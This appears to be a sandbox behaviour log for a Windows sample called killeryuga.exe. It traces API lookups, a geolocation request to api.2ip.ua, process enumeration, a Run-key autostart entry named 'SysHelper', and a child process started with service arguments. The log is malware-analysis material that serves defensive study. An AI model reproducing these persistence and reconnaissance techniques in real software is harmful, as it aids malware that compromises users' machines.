Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Process Open desired_access = SYNCHRONIZE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Process #20: killeryuga.exe
684 7
»
Information Value
ID #20
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1416 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:23, Reason: Child Process
Unmonitor End Time: 00:03:41, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0x7a0
Parent PID 0x588 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7B0
0x 6A4
0x 6A0
0x 33C
0x 6AC
0x 694
0x 698
0x 69C
0x 688
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x002B43B0 0x002E3716 Marked Executable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Forced - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
...
Threads
Thread 0x7b0
463 7
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 05:39:10 (UTC) True 1
Fn
System Get Time type = Ticks, time = 106533 True 1
Fn
System Get Time type = Performance Ctr, time = 15370031874 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = RPCRT4.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Module Load module_name = MPR.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75d30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x75090000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x750926e0 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x77020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x770381ef True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75361986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x7538830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x7536183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7538896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7538828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75362d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75365558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x75364467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x753634d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
